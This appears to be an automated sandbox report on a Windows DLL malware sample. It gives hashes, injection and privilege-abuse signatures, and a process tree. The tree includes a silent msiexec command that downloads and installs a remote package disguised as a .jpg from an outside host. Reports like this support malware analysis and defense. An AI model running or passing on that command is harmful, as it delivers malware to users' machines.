Analysis
-
max time kernel
61s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
24-07-2022 17:23
Behavioral task
behavioral1
Sample
57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll
Resource
win7-20220715-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll
Resource
win10v2004-20220721-en
4 signatures
150 seconds
General
-
Target
57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll
-
Size
5KB
-
MD5
f768a1ec913aea0915bcc20c17896be3
-
SHA1
a362956664379ff9860a3c56fb1daf6e000220c4
-
SHA256
57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a
-
SHA512
9fa8de6d9c4736dd0300e334137d3e60e42860f7b70dd452b35d515b3d7ebca0ef942d3bc65613d6be8e91a4f93c4c58b4e81d99649a9941cfafb46185f6dc9d
Score
7/10
Malware Config
Signatures
-
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 4420 msiexec.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
rundll32.exedescription pid process target process PID 808 set thread context of 1196 808 rundll32.exe rundll32.exe -
Suspicious use of AdjustPrivilegeToken 32 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 4420 msiexec.exe Token: SeIncreaseQuotaPrivilege 4420 msiexec.exe Token: SeSecurityPrivilege 4464 msiexec.exe Token: SeCreateTokenPrivilege 4420 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4420 msiexec.exe Token: SeLockMemoryPrivilege 4420 msiexec.exe Token: SeIncreaseQuotaPrivilege 4420 msiexec.exe Token: SeMachineAccountPrivilege 4420 msiexec.exe Token: SeTcbPrivilege 4420 msiexec.exe Token: SeSecurityPrivilege 4420 msiexec.exe Token: SeTakeOwnershipPrivilege 4420 msiexec.exe Token: SeLoadDriverPrivilege 4420 msiexec.exe Token: SeSystemProfilePrivilege 4420 msiexec.exe Token: SeSystemtimePrivilege 4420 msiexec.exe Token: SeProfSingleProcessPrivilege 4420 msiexec.exe Token: SeIncBasePriorityPrivilege 4420 msiexec.exe Token: SeCreatePagefilePrivilege 4420 msiexec.exe Token: SeCreatePermanentPrivilege 4420 msiexec.exe Token: SeBackupPrivilege 4420 msiexec.exe Token: SeRestorePrivilege 4420 msiexec.exe Token: SeShutdownPrivilege 4420 msiexec.exe Token: SeDebugPrivilege 4420 msiexec.exe Token: SeAuditPrivilege 4420 msiexec.exe Token: SeSystemEnvironmentPrivilege 4420 msiexec.exe Token: SeChangeNotifyPrivilege 4420 msiexec.exe Token: SeRemoteShutdownPrivilege 4420 msiexec.exe Token: SeUndockPrivilege 4420 msiexec.exe Token: SeSyncAgentPrivilege 4420 msiexec.exe Token: SeEnableDelegationPrivilege 4420 msiexec.exe Token: SeManageVolumePrivilege 4420 msiexec.exe Token: SeImpersonatePrivilege 4420 msiexec.exe Token: SeCreateGlobalPrivilege 4420 msiexec.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
rundll32.exerundll32.exerundll32.exedescription pid process target process PID 4328 wrote to memory of 808 4328 rundll32.exe rundll32.exe PID 4328 wrote to memory of 808 4328 rundll32.exe rundll32.exe PID 4328 wrote to memory of 808 4328 rundll32.exe rundll32.exe PID 808 wrote to memory of 1196 808 rundll32.exe rundll32.exe PID 808 wrote to memory of 1196 808 rundll32.exe rundll32.exe PID 808 wrote to memory of 1196 808 rundll32.exe rundll32.exe PID 808 wrote to memory of 1196 808 rundll32.exe rundll32.exe PID 1196 wrote to memory of 4420 1196 rundll32.exe msiexec.exe PID 1196 wrote to memory of 4420 1196 rundll32.exe msiexec.exe PID 1196 wrote to memory of 4420 1196 rundll32.exe msiexec.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll,#12⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exemsiexec /i https://dl.eqwauemt.com/Downupdatesoftmakerup.jpg /q4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken